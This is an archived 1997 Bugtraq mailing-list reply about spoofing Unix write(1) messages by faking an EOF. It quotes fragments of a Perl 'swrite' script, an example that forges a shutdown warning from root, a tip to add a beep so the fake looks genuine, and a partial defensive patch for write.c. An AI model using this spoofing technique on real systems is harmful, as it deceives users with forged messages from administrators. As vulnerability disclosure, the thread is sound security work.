Bugtraq mailing list archives
Re: write(1)
From: jauderho () NETCOM COM (Jauder Ho)
Date: Thu, 22 May 1997 11:20:44 -0700
to do the beep.... try \cG print(JIM "\cG\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n"); --Jauder (Perl is your friend!) On Wed, 21 May 1997, test wrote:
Program Effected: write(1) Impact: Mostly Harmless It is trivial to spoof a write from one user to the next locally on a system by faking an "EOF". This ofcourse does not effect users who have turned off their write permissions. It's also fairly noticeable by the lack of any beep. print(JIM "\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n"); foreach $line (@to_write){ sleep $delay; print (JIM "$line\n"); } $| = 0; close(JIM); -------------------------------swrite---------------------------------------- example usage... Un*x % echo The System is going down IMMIDIATELY\! | ./swrite \ user root console If your an absolute paranoid, here are the diff's of an incomplete patch for write.c.. it's a start anyhow. 281c281,284 < while (fgets(line, sizeof(line), stdin) != NULL) ---while (fgets(line, sizeof(line), stdin) != NULL){ if(!strcmp(line, "EOF\n")){ (void)strcpy(line, "EOF <-- Warning: Not End of File.\n"); }282a286}It'll work for "EOF" just not for "EOF " or "EOF " etc...
.sig under construction
Current thread:
- Re: SunOS exploit. Jeff Uphoff (May 19)
- Re: SunOS exploit. Trevor Linton (May 18)
- /dev/tcx0 crashes SunOS 4.1.4 on Sparc 20's Dixon Ly (May 19)
- Re: /dev/tcx0 crashes SunOS 4.1.4 on Sparc 20's Fabrice Planchon (May 20)
- Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Sparc Walter Hafner (May 21)
- write(1) test (May 21)
- Re: write(1) Jauder Ho (May 22)
- Re: Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Mike Scher (May 21)
- Re: Fun with devices [was: Re: /dev/tcx0 crashes SunOS 4.1.4 on Doug Hughes (May 22)
- /dev/tcx0 crashes SunOS 4.1.4 on Sparc 20's Dixon Ly (May 19)
- Re: SunOS exploit. Trevor Linton (May 18)
- Re: SunOS exploit. & DigitalUnix Joe Zbiciak (May 20)